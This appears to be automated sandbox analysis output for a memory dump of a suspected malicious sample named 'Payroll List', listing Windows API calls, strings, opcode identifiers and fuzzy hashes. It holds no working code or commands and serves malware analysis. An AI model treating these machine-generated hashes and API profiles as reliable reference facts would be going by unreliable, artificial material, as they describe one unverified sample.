                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: 7b4620d05f63d72693972c0d43eca96e745d740249377fad2ffae2786e4b4137
                                                                    • Instruction ID: 166c7c9a34b80d05f00853ce86279458a5330d429ce97a9d6c6e47117ec314b1
                                                                    • Opcode Fuzzy Hash: 7b4620d05f63d72693972c0d43eca96e745d740249377fad2ffae2786e4b4137
                                                                    • Instruction Fuzzy Hash: 1E41B430108544AFDF245F28ECC9BB93B65AB06731F184265FE668E9E6E7318C81D726
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                    • String ID:
                                                                    • API String ID: 136442275-0
                                                                    • Opcode ID: 3048170e2c1ebed5edcce9fdfb9bbd350072424b9098fe4d5a965e75e25124b7
                                                                    • Instruction ID: 04542da1aed3532afbd470e2b335874c317c1e620cb44ae6ebfc5b954a79f918
                                                                    • Opcode Fuzzy Hash: 3048170e2c1ebed5edcce9fdfb9bbd350072424b9098fe4d5a965e75e25124b7
                                                                    • Instruction Fuzzy Hash: 98412E7684511CAECF66DB90CC95DDE73BCEB58310F0041E6FA59A2051EB30ABE98F50
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(001BDC00,001BDC00,001BDC00), ref: 0016D7CE
                                                                    • GetDriveTypeW.KERNEL32(?,001D3A70,00000061), ref: 0016D898
                                                                    • _wcscpy.LIBCMT ref: 0016D8C2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2820617543-1000479233
                                                                    • Opcode ID: bb7213e4b0f186111e838f237efd1acceb91744aae01d968876ef5cc9a06143b
                                                                    • Instruction ID: 79b88bee9fee77008406f9d9a0cc404a96600772239385c9114d1d5d7ab2b54b
                                                                    • Opcode Fuzzy Hash: bb7213e4b0f186111e838f237efd1acceb91744aae01d968876ef5cc9a06143b
                                                                    • Instruction Fuzzy Hash: 4551A7356043009FC704EF14EC91A6EB7E5EFA4314F50892DF59A572A2DB31DD15CB82
                                                                    APIs
                                                                    • __swprintf.LIBCMT ref: 001293AB
                                                                    • __itow.LIBCMT ref: 001293DF
                                                                      • Part of subcall function 00141557: _xtow@16.LIBCMT ref: 00141578
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __itow__swprintf_xtow@16
                                                                    • String ID: %.15g$0x%p$False$True
                                                                    • API String ID: 1502193981-2263619337
                                                                    • Opcode ID: 5f68356940854a768783f4d153b0d9ae8ce4b3d82e2d83f9d257703f70d8b79c
                                                                    • Instruction ID: 17e4f3f6a10e5bbd615312521d98bc3c839d5bb932c75fcb7efb9465a1d4da6c
                                                                    • Opcode Fuzzy Hash: 5f68356940854a768783f4d153b0d9ae8ce4b3d82e2d83f9d257703f70d8b79c
                                                                    • Instruction Fuzzy Hash: 7541E331904214AFEB28DF78E942EAA73E8FF58310F20446EE14AD7291EB31D952CB51
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0018A259
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0018A260
                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0018A273
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0018A27B
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0018A286
                                                                    • DeleteDC.GDI32(00000000), ref: 0018A28F
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0018A299
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0018A2AD
                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0018A2B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                    • String ID: static
                                                                    • API String ID: 2559357485-2160076837
                                                                    • Opcode ID: 4044b381a15068f4144fae17405df7efe8bfb1beeea6bf0f7b42c6d802b97b83
                                                                    • Instruction ID: 747d7855f9fb6dfcff62b6c73be2337c862615851a4b2e91051976ccf0ccbe9a
                                                                    • Opcode Fuzzy Hash: 4044b381a15068f4144fae17405df7efe8bfb1beeea6bf0f7b42c6d802b97b83
                                                                    • Instruction Fuzzy Hash: 5C319E31100615BBEF21AFA4EC49FEA3B69FF1E360F110215FA1AA64A0C731D951DBA4
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 2620052-3771769585
                                                                    • Opcode ID: ba904fc83e9954994299f390c591a704db8bf89d981fc3be3654833d2433c7df
                                                                    • Instruction ID: 5172974c0b81651334be50da357e66e95e098fae1e2185b0f4e7fa83e6ffc8a0
                                                                    • Opcode Fuzzy Hash: ba904fc83e9954994299f390c591a704db8bf89d981fc3be3654833d2433c7df
                                                                    • Instruction Fuzzy Hash: D0110672904215ABCB28ABB0EC0AEDA77ACEF55724F0000A9F106E6091FF74DED58B51
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00145047
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    • __gmtime64_s.LIBCMT ref: 001450E0
                                                                    • __gmtime64_s.LIBCMT ref: 00145116
                                                                    • __gmtime64_s.LIBCMT ref: 00145133
                                                                    • __allrem.LIBCMT ref: 00145189
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001451A5
                                                                    • __allrem.LIBCMT ref: 001451BC
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001451DA
                                                                    • __allrem.LIBCMT ref: 001451F1
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0014520F
                                                                    • __invoke_watson.LIBCMT ref: 00145280
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                    • String ID:
                                                                    • API String ID: 384356119-0
                                                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                    • Instruction ID: 05b4aeaa86b5aefc64eb344d36dcc973fe866d0e9ecb0c6fa4f0d6a7a372ca33
                                                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                    • Instruction Fuzzy Hash: 89710776A00F17EBE7149E78CC41BAA73AAAF11764F14422AF914DB293E770DD408BD0
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00164DF8
                                                                    • GetMenuItemInfoW.USER32(001E1708,000000FF,00000000,00000030), ref: 00164E59
                                                                    • SetMenuItemInfoW.USER32(001E1708,00000004,00000000,00000030), ref: 00164E8F
                                                                    • Sleep.KERNEL32(000001F4), ref: 00164EA1
                                                                    • GetMenuItemCount.USER32(?), ref: 00164EE5
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00164F01
                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00164F2B
                                                                    • GetMenuItemID.USER32(?,?), ref: 00164F70
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00164FB6
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00164FCA
                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00164FEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                    • String ID:
                                                                    • API String ID: 4176008265-0
                                                                    • Opcode ID: 54e4edb613714167c61a62bebe5aafb0fb28881c8d1fff272edc6898bee48544
                                                                    • Instruction ID: 5024e668a13737d3b5b89bb0bc2b7fabb58b88c996756a2e8ef6722719b28acd
                                                                    • Opcode Fuzzy Hash: 54e4edb613714167c61a62bebe5aafb0fb28881c8d1fff272edc6898bee48544
                                                                    • Instruction Fuzzy Hash: 6B61B2B1900289EFDB25CFA8DC88EBE7BB9FB05304F144099F442A7651D731AD65CB60
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00189C98
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00189C9B
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00189CBF
                                                                    • _memset.LIBCMT ref: 00189CD0
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00189CE2
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00189D5A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 830647256-0
                                                                    • Opcode ID: 5c81d73306e0cd7edca5984b16ac4114c9eb79df9e9cbc9da400ecf40e6bc893
                                                                    • Instruction ID: 55d84f8f294c9bc6492b5f0e8840570d0719c476ae9083f74a92fc9937e0beaf
                                                                    • Opcode Fuzzy Hash: 5c81d73306e0cd7edca5984b16ac4114c9eb79df9e9cbc9da400ecf40e6bc893
                                                                    • Instruction Fuzzy Hash: A8616B75900248AFDB11DFA8CC81EFEB7B8EB09714F184159FA15AB2A1D770AE42DF50
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 001594FE
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00159549
                                                                    • VariantInit.OLEAUT32(?), ref: 0015955B
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0015957B
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 001595BE
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 001595D2
                                                                    • VariantClear.OLEAUT32(?), ref: 001595E7
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 001595F4
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001595FD
                                                                    • VariantClear.OLEAUT32(?), ref: 0015960F
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0015961A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 9f509102ccce549ef53d10e57b10e8989e4948616727104cffa978e037c9c455
                                                                    • Instruction ID: 9ed03e5be3a69f0a3547cc827d4686679e9c4ccde787452850ef45445a5562a9
                                                                    • Opcode Fuzzy Hash: 9f509102ccce549ef53d10e57b10e8989e4948616727104cffa978e037c9c455
                                                                    • Instruction Fuzzy Hash: 51415D75A00219EFCB01EFA4DC449DEBF79FF08355F008065F912A7A51DB30AA89CBA1
                                                                    APIs
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • CoInitialize.OLE32 ref: 0017ADF6
                                                                    • CoUninitialize.OLE32 ref: 0017AE01
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,001AD8FC,?), ref: 0017AE61
                                                                    • IIDFromString.OLE32(?,?), ref: 0017AED4
                                                                    • VariantInit.OLEAUT32(?), ref: 0017AF6E
                                                                    • VariantClear.OLEAUT32(?), ref: 0017AFCF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 834269672-1287834457
                                                                    • Opcode ID: 7fff75d42885b0ec0778e02fddbea5bf3427d9573af70216db143526d092ceec
                                                                    • Instruction ID: 354a6fe9a7a89f88c3e4fc671e29ec043ed53b7c2f105b9b2e6b0faef9d5fbc4
                                                                    • Opcode Fuzzy Hash: 7fff75d42885b0ec0778e02fddbea5bf3427d9573af70216db143526d092ceec
                                                                    • Instruction Fuzzy Hash: F6618C70208711AFD711DF64D888B6EBBF8AF89714F508519F98A9B291CB70ED44CB93
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00178168
                                                                    • inet_addr.WSOCK32(?,?,?), ref: 001781AD
                                                                    • gethostbyname.WSOCK32(?), ref: 001781B9
                                                                    • IcmpCreateFile.IPHLPAPI ref: 001781C7
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00178237
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0017824D
                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 001782C2
                                                                    • WSACleanup.WSOCK32 ref: 001782C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: a953cc5705d18aea3dbe8b260b932945098b00ca7c08f295c23242ef042b4411
                                                                    • Instruction ID: 313ebb0325d9ce6da171fbcc343e92ef2c51f6ed557c2d288182de6d9426aa9e
                                                                    • Opcode Fuzzy Hash: a953cc5705d18aea3dbe8b260b932945098b00ca7c08f295c23242ef042b4411
                                                                    • Instruction Fuzzy Hash: 5251B131644700AFD710EF64DC49B2ABBF4EF59320F048869FA5ADB2A1DB30E941CB41
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00189E5B
                                                                    • CreateMenu.USER32 ref: 00189E76
                                                                    • SetMenu.USER32(?,00000000), ref: 00189E85
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00189F12
                                                                    • IsMenu.USER32(?), ref: 00189F28
                                                                    • CreatePopupMenu.USER32 ref: 00189F32
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00189F63
                                                                    • DrawMenuBar.USER32 ref: 00189F71
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                    • String ID: 0
                                                                    • API String ID: 176399719-4108050209
                                                                    • Opcode ID: d35201a4057f6171c125d13933b023de8b0d93e403ba4e6e618c39d27295a7d5
                                                                    • Instruction ID: 4fc5dae658d38dec4f9b1bbbe31421f5819ccbfc88aa677d67f5bab31f8c9899
                                                                    • Opcode Fuzzy Hash: d35201a4057f6171c125d13933b023de8b0d93e403ba4e6e618c39d27295a7d5
                                                                    • Instruction Fuzzy Hash: 20414C74A01205AFDB14DFA4E884BEABBB5FF49314F184119FA46EB350D770AA54CF50
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0016E396
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0016E40C
                                                                    • GetLastError.KERNEL32 ref: 0016E416
                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0016E483
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: 0e5bb36edaf9442824b4fe9bbe40092f5fb7c141f9df09f420cfd2dd3d334922
                                                                    • Instruction ID: b0b63c1ff7087d2b361df03b4bc9aed9a23a855c4dd8c8ec2ae490fb63e5cee9
                                                                    • Opcode Fuzzy Hash: 0e5bb36edaf9442824b4fe9bbe40092f5fb7c141f9df09f420cfd2dd3d334922
                                                                    • Instruction Fuzzy Hash: 9D318439A002199FDB01EFB4DC45ABDB7F4EF55300F148126E516EB291DB70AA51CB91
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0015B98C
                                                                    • GetDlgCtrlID.USER32 ref: 0015B997
                                                                    • GetParent.USER32 ref: 0015B9B3
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0015B9B6
                                                                    • GetDlgCtrlID.USER32(?), ref: 0015B9BF
                                                                    • GetParent.USER32(?), ref: 0015B9DB
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0015B9DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1383977212-1403004172
                                                                    • Opcode ID: 4ad315edfee1a2363b36c2bbe4cf9e97a9cf8ddadb9d6856e60d3d735bf7e5ed
                                                                    • Instruction ID: 793b46fea5716feb7cfcb9ef4140e03a33a84a8887917cfad8dd72fce5e3b374
                                                                    • Opcode Fuzzy Hash: 4ad315edfee1a2363b36c2bbe4cf9e97a9cf8ddadb9d6856e60d3d735bf7e5ed
                                                                    • Instruction Fuzzy Hash: 0921B3B4900104FFDB04ABA4DC86EFEBB75EF5A301F10011AFA66972E1DB745869DB60
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0015BA73
                                                                    • GetDlgCtrlID.USER32 ref: 0015BA7E
                                                                    • GetParent.USER32 ref: 0015BA9A
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0015BA9D
                                                                    • GetDlgCtrlID.USER32(?), ref: 0015BAA6
                                                                    • GetParent.USER32(?), ref: 0015BAC2
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0015BAC5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
